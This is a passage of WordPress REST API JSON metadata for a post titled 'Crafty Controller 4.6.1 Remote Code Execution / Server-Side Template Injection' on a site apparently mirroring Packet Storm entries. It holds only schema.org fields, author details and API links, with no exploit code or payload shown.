redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-12-23T11:54:31+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=32543#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=32543"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=32543#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 Crafty Controller 4.6.1 Remote Code Execution \/ Server-Side Template Injection_PACKETSTORM:213258"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32543","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=32543"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/32543\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=32543"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=32543"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=32543"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}